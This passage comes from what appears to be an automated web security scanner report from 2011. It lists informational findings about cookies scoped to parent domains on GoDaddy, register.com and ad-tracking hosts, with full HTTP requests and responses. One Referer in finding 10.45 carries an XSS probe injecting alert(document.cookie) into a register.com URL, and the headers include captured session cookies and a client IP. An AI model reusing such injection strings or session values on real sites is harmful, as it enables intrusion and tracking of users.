OK&querystring=&shopper=46215684&privatelabelid=1&isc=&clientip=50.23.123.106&referringpath=8d587be0-834e-4a03-83dc-2f3bcb783a40&referringdomain=&split=24; BlueLithium_ssl=hbuftbbciczbydeibifgffggtihijizc

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: image/gif
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: pagecount=3; domain=.godaddy.com; path=/
Set-Cookie: fb_pagecount=3; path=/
Set-Cookie: actioncount=22804%0d%0aa0acc03b446; domain=.godaddy.com; path=/
Set-Cookie: fb_actioncount=38ba47e39a3cd44efaca8d89; path=/
Set-Cookie: app_pathway=38ba47e3b0f3e75ec51f0668; domain=.godaddy.com; path=/
Set-Cookie: fb_session=S_TOUCH=09/03/2011 21:49:36&pathway=8d587be0-834e-4a03-83dc-2f3bcb783a40&V_DATE=09/03/2011 14:28:5938ba47e368c05affcb2650a6; path=/
Set-Cookie: isc="; domain=.godaddy.com; path=/
Set-Cookie: visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; domain=.godaddy.com; expires=Sun, 02-Sep-2012 21:49:36 GMT; path=/
Set-Cookie: traffic=; domain=.godaddy.com; path=/
X-Powered-By: ASP.NET
P3P: CP=IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA
Date: Sat, 03 Sep 2011 21:49:36 GMT
Content-Length: 43

GIF89a.............!.......,...........D..;

10.41. http://img.godaddy.com/pageevents.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://img.godaddy.com
Path:   /pageevents.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pageevents.aspx?page_name=/ssl/ssl-certificates.aspx&ci=15014&eventtype=&ciimpressions=&usrin=&r=0.6363521805033088&comview=0 HTTP/1.1
Host: img.godaddy.com
Proxy-Connection: keep-alive
Referer: http://www.godaddy.com/ssl/ssl-certificates.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flag1=cflag=us; currencypopin1=cdisplaypopin=false; SplitValue1=24; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; pathway=8d587be0-834e-4a03-83dc-2f3bcb783a40; ShopperId1=yjjjodldcfygaahhseaipjhbleigjbpa; pagecount=2; fb_pagecount=2; actioncount=; fb_actioncount=; app_pathway=; fb_session=S_TOUCH=09/03/2011 21:32:13&pathway=8d587be0-834e-4a03-83dc-2f3bcb783a40&V_DATE=09/03/2011 14:28:59; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; domainYardVal=%2D1; serverVersion=A; preferences1=_sid=yishkaeegbnbqewgxixgkfpfeekbejsf&dataCenterCode=US&gdshop_currencyType=USD; adc1=US; currency1=potableSourceStr=USD; traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/ssl/ssl-certificates.aspx&server=M1PWCORPWEB109&status=200 OK&querystring=&shopper=46215684&privatelabelid=1&isc=&clientip=50.23.123.106&referringpath=8d587be0-834e-4a03-83dc-2f3bcb783a40&referringdomain=&split=24; BlueLithium_ssl=hbuftbbciczbydeibifgffggtihijizc; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: image/gif
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: pagecount=15; domain=.godaddy.com; path=/
Set-Cookie: fb_pagecount=15; path=/
Set-Cookie: actioncount=22804%0d%0aa0acc03b446; domain=.godaddy.com; path=/
Set-Cookie: fb_actioncount=38ba47e39a3cd44efaca8d89; path=/
Set-Cookie: app_pathway=38ba47e3b0f3e75ec51f0668; domain=.godaddy.com; path=/
Set-Cookie: fb_session=S_TOUCH=09/03/2011 21:49:49&pathway=8d587be0-834e-4a03-83dc-2f3bcb783a40&V_DATE=09/03/2011 14:28:5938ba47e368c05affcb2650a6; path=/
Set-Cookie: isc="; domain=.godaddy.com; path=/
Set-Cookie: visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; domain=.godaddy.com; expires=Sun, 02-Sep-2012 21:49:50 GMT; path=/
X-Powered-By: ASP.NET
P3P: CP=IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA
Date: Sat, 03 Sep 2011 21:49:50 GMT
Content-Length: 43

GIF89a.............!.......,...........D..;

10.42. http://m.adnxs.com/msftcookiehandler  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m.adnxs.com
Path:   /msftcookiehandler

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /msftcookiehandler?t=1&c=MUID%3d9FA60E9E25934DD3BB2BBC07F1AAFA23 HTTP/1.1
Host: m.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.cheapssls.com/geotrust-ssl-certificates/quickssl-premium.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIrIsBEAoYASABKAEwwfGD8wQQwfGD8wQYAA..; sess=1; uuid2=6422714091563403120; anj=Kfu=8fG10Qcvjr/?0P(*AuB-u**g1:XICjmEi'/29uJ21V.fsQSr=z6NGgptu>0_YXw_T%?9*a5p4!1-waB6<#uuy!Q#lx*XEB@`D:dkd7>T]xMWu7a9T1Y1.^NXLlK839uon7j94%gch60)-@(Z_[!1jn1vzCbx

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sun, 04-Sep-2011 21:38:27 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=6422714091563403120; path=/; expires=Fri, 02-Dec-2011 21:38:27 GMT; domain=.adnxs.com; HttpOnly
Content-Length: 43
Content-Type: image/gif
Date: Sat, 03 Sep 2011 21:38:27 GMT

GIF89a.............!.......,........@..L..;

10.43. https://mya.godaddy.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mya.godaddy.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: mya.godaddy.com
Connection: keep-alive
Referer: https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB109&target=http%3A%2F%2Fwww.godaddy.com%2Fssl%2Fssl-certificates.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flag1=cflag=us; currencypopin1=cdisplaypopin=false; SplitValue1=24; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; ShopperId1=yjjjodldcfygaahhseaipjhbleigjbpa; domainYardVal=%2D1; serverVersion=A; preferences1=_sid=yishkaeegbnbqewgxixgkfpfeekbejsf&dataCenterCode=US&gdshop_currencyType=USD; BlueLithium_ssl=hbuftbbciczbydeibifgffggtihijizc; adc1=US; currency1=potableSourceStr=USD; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pathway=4f057259-4645-4223-96aa-98d6262a1c68; pagecount=1; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; traffic=

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 00:28:34 GMT
Server: Microsoft-IIS/6.0
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: https://idp.godaddy.com/login.aspx?SPKey=GDMYA-M1PWMYAWEB006&redirect=true&myaurl=%2fdefault.aspx
Set-Cookie: ShopperId1=mcjidfagdephnjweyclebfehyathlbaj; domain=godaddy.com; expires=Sat, 04-Sep-2021 00:28:34 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 222

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://idp.godaddy.com/login.aspx?SPKey=GDMYA-M1PWMYAWEB006&amp;redirect=true&amp;myaurl=%2fdefault.aspx">here</a>.<
...[SNIP]...

10.44. https://mya.godaddy.com/products/accountlist.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mya.godaddy.com
Path:   /products/accountlist.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /products/accountlist.aspx HTTP/1.1
Host: mya.godaddy.com
Connection: keep-alive
Referer: https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB109&target=http%3A%2F%2Fwww.godaddy.com%2Fssl%2Fssl-certificates.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flag1=cflag=us; currencypopin1=cdisplaypopin=false; SplitValue1=24; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; pathway=8d587be0-834e-4a03-83dc-2f3bcb783a40; ShopperId1=yjjjodldcfygaahhseaipjhbleigjbpa; domainYardVal=%2D1; serverVersion=A; preferences1=_sid=yishkaeegbnbqewgxixgkfpfeekbejsf&dataCenterCode=US&gdshop_currencyType=USD; BlueLithium_ssl=hbuftbbciczbydeibifgffggtihijizc; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pagecount=2; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; adc1=US; currency1=potableSourceStr=USD; traffic=

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 00:26:13 GMT
Server: Microsoft-IIS/6.0
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: https://idp.godaddy.com/login.aspx?SPKey=GDMYA-M1PWMYAWEB006&redirect=false&myaurl=%2fproducts%2faccountlist.aspx
Set-Cookie: ShopperId1=fhvekhlijizajdrfuatbuisjhckdhiwb; domain=godaddy.com; expires=Sat, 04-Sep-2021 00:26:13 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 238

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://idp.godaddy.com/login.aspx?SPKey=GDMYA-M1PWMYAWEB006&amp;redirect=false&amp;myaurl=%2fproducts%2faccountlist.
...[SNIP]...

10.45. http://oascentral.register.com/RealMedia/ads/adstream_mjx.ads/register.com/index/1269119279@Position1,x50,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Bottom  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.register.com
Path:   /RealMedia/ads/adstream_mjx.ads/register.com/index/1269119279@Position1,x50,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Bottom

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/register.com/index/1269119279@Position1,x50,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Bottom? HTTP/1.1
Host: oascentral.register.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.register.com/font41cfd%22%3balert(document.cookie)//a7bdf3e7ba5/vag-bold.ttf
Cookie: TLTSID=BEBCC488D67410D6177BEE195E4E2E9D; mbox=check#true#1315085873|session#1315085812182-148030#1315087673|PC#1315085812182-148030.19#1317677814

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:36:19 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: OAX=Mhd7ak5indMAAU0C; expires=Tue, 03-Sep-13 21:36:19 GMT; path=/; domain=.register.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4620
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09419e5f45525d5f4f58455e445a4a423660;path=/;httponly

function OAS_RICH(position) {
if (position == 'Bottom') {
document.write ('<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/index/1456927453/Bottom/default/empty.gif/4d6
...[SNIP]...

10.46. http://oascentral.register.com/RealMedia/ads/adstream_mjx.ads/register.com/viewproductdetail/getadomain/1680914497@Position1,x50,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Bottom  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.register.com
Path:   /RealMedia/ads/adstream_mjx.ads/register.com/viewproductdetail/getadomain/1680914497@Position1,x50,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Bottom

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/register.com/viewproductdetail/getadomain/1680914497@Position1,x50,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Bottom? HTTP/1.1
Host: oascentral.register.com
Proxy-Connection: keep-alive
Referer: http://www.register.com/domain/searchresults.rcmx?webmetrics=null&searchOrigin=homepage&domain=xss&selectedTLDs=.com&x=0&y=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=C8693DAAD67310D60E179E16E4910D7E; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma=195431987.824255109.1315085416.1315085416.1315085416.1; __utmb=195431987.1.10.1315085416; __utmc=195431987; __utmz=195431987.1315085416.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|27314E20051D1798-6000010600062C35[CE]; mbox=session#1315085400638-452340#1315087347|PC#1315085400638-452340.19#1317677487|check#true#1315085547

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:30:51 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: OAX=Mhd7ak5inIsACxRd; expires=Tue, 03-Sep-13 21:30:51 GMT; path=/; domain=.register.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 11391
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e5f45525d5f4f58455e445a4a423660;path=/;httponly

function OAS_RICH(position) {
if (position == 'Bottom') {
document.write ('<script language=javascript type=text/javascript> \n');
document.write ('<!-- -- START: POP TYPE CONTROLS -- --> \n');
docume
...[SNIP]...

10.47. http://pixel.adblade.com/imps.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.adblade.com
Path:   /imps.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /imps.php?sgms=38 HTTP/1.1
Host: pixel.adblade.com
Proxy-Connection: keep-alive
Referer: http://login.dotomi.com/ucm/UCMController?dtm_com=28&dtm_fid=101&dtm_cid=2304&dtm_cmagic=e6c2dc&dtm_format=5&cli_promo_id=4&dtm_user_id=&dtmc_user_type=NEW&dtmc_product_type=Domain&dtmc_product_id=TTN%3A%20Domains%3A%20Search%3A%20Taken&dtmc_domain_name=xss.com&dtm_items=&dtmc_domain_status=TAKEN&dtmc_domain_variations=xss.la&dtmc_source=WWW000000000W&dtmc_ref=http%3A//www.register.com/&dtmc_loc=http%3A//www.register.com/domain/searchresults.rcmx%3Fwebmetrics%3Dnull%26searchOrigin%3Dhomepage%26domain%3Dxss%26selectedTLDs%3D.com%26x%3D0%26y%3D0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.8
P3P: policyref="http://adblade.com/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Vendor: W3matter LLC | RevSense | http://www.w3matter.com
Set-Cookie: __sgs=9H1OEBpHJTWK0eUV1IWqNKX4KF4U8ibH6Zl%2FNq6xhhI%3D; expires=Sun, 02-Sep-2012 21:40:32 GMT; path=/; domain=.adblade.com
Content-type: image/gif;
Date: Sat, 03 Sep 2011 21:40:32 GMT
Server: lighttpd/1.4.21
Content-Length: 43

GIF89a.............!.......,...........D..;

10.48. http://pixel.mathtag.com/event/img  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.mathtag.com
Path:   /event/img

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /event/img?mt_id=108043&mt_adid=111&v1=&v2=&v3=&s1=&s2=&s3= HTTP/1.1
Host: pixel.mathtag.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.omniture.com/en/
Cookie: uuid=4e394470-3e17-879f-6d77-411115d4b5ad; ts=1315061012; mt_mop=4:1313678521|10001:1312768945|10002:1313678517|13:1312375922

Response

HTTP/1.1 302 Found
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 pao-pixel-x4 pid 0x7f39 32569
Cache-Control: no-cache
Content-Type: image/gif
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Date: Sat, 03 Sep 2011 14:43:59 GMT
Location: http://loadm.exelator.com/load/?p=204&g=101&buid=4e394470-3e17-879f-6d77-411115d4b5ad&j=0
Connection: Keep-Alive
Set-Cookie: ts=1315061039; domain=.mathtag.com; path=/; expires=Sun, 02-Sep-2012 14:43:59 GMT
Set-Cookie: mt_mop=10008:1315061039|5:1315061038|10002:1313678517|4:1313678521|10001:1312768945; domain=.mathtag.com; path=/; expires=Mon, 03-Oct-2011 14:43:59 GMT
Content-Length: 43

GIF89a.............!.......,...........D..;

10.49. http://pixel.mathtag.com/event/js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.mathtag.com
Path:   /event/js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /event/js?mt_id=108024&mt_adid=111&v1=&v2=&v3=&s1=&s2=&s3= HTTP/1.1
Host: pixel.mathtag.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.omniture.com/en/
Cookie: uuid=4e394470-3e17-879f-6d77-411115d4b5ad; ts=1313859917; mt_mop=4:1313678521|10001:1312768945|10002:1313678517|13:1312375922

Response

HTTP/1.1 200 OK
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 pao-pixel-x2 pid 0x79ea 31210
Cache-Control: no-cache
Content-Type: text/javascript
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Date: Sat, 03 Sep 2011 14:43:33 GMT
Connection: Keep-Alive
Set-Cookie: ts=1315061013; domain=.mathtag.com; path=/; expires=Sun, 02-Sep-2012 14:43:33 GMT
Content-Length: 924

   /*
   http://pixel.mathtag.com/event/img?mt_id=108043&mt_adid=111&v1=&v2=&v3=&s1=&s2=&s3=
   http://ad.yieldmanager.com/pixel?id=1429123&id=725544&id=74894&id=547417&id=119282&t=2
   */

   var mm_ri = Strin
...[SNIP]...

10.50. http://pixel.rubiconproject.com/tap.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=4940&nid=1994&put=vf1kj11kp2en&expires=30 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh52.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rpb=7908%3D1; rpx=7908%3D14600%2C0%2C1%2C%2C

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 17:32:23 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=7908%3D1%264940%3D1; expires=Mon, 03-Oct-2011 17:32:23 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C2%2C%2C; expires=Mon, 03-Oct-2011 17:32:23 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_1994=vf1kj11kp2en; expires=Mon, 03-Oct-2011 17:32:23 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

10.51. http://pixel.rubiconproject.com/tap.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=5364&nid=2046&expires=30&put=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://login.dotomi.com/ucm/UCMController?dtm_com=28&dtm_fid=101&dtm_cid=2304&dtm_cmagic=e6c2dc&dtm_format=5&cli_promo_id=4&dtm_user_id=&dtmc_user_type=NEW&dtmc_product_type=Domain&dtmc_product_id=TTN%3A%20Domains%3A%20Search%3A%20Taken&dtmc_domain_name=xss.com&dtm_items=&dtmc_domain_status=TAKEN&dtmc_domain_variations=xss.la&dtmc_source=WWW000000000W&dtmc_ref=http%3A//www.register.com/&dtmc_loc=http%3A//www.register.com/domain/searchresults.rcmx%3Fwebmetrics%3Dnull%26searchOrigin%3Dhomepage%26domain%3Dxss%26selectedTLDs%3D.com%26x%3D0%26y%3D0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rpb=7908%3D1%264940%3D1; rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C; put_1994=vf1kj11kp2en

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:40:33 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=7908%3D1%264940%3D1%265364%3D1; expires=Mon, 03-Oct-2011 21:40:33 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C0%2C2%2C%2C; expires=Mon, 03-Oct-2011 21:40:33 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; expires=Mon, 03-Oct-2011 21:40:33 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

10.52. http://r.openx.net/set  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.openx.net
Path:   /set

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /set?pid=0b83a084-dd0b-4bfe-9e2e-ab3706fc9955&rtb=uuid%3D4e394470-3e17-879f-6d77-411115d4b5ad HTTP/1.1
Host: r.openx.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.omniture.com/en/
Cookie: i=fbe566bc-e601-4d14-a2ef-601df1907cf9; p=1313437184

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 14:44:00 GMT
Server: Apache
Cache-Control: public, max-age=30, proxy-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: i=fbe566bc-e601-4d14-a2ef-601df1907cf9; expires=Mon, 02-Sep-2013 14:44:00 GMT; path=/; domain=.openx.net
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

10.53. http://scripts.omniture.com/global/scripts/targeting/dyn_prop.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scripts.omniture.com
Path:   /global/scripts/targeting/dyn_prop.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/scripts/targeting/dyn_prop.php HTTP/1.1
Host: scripts.omniture.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.omniture.com/en/
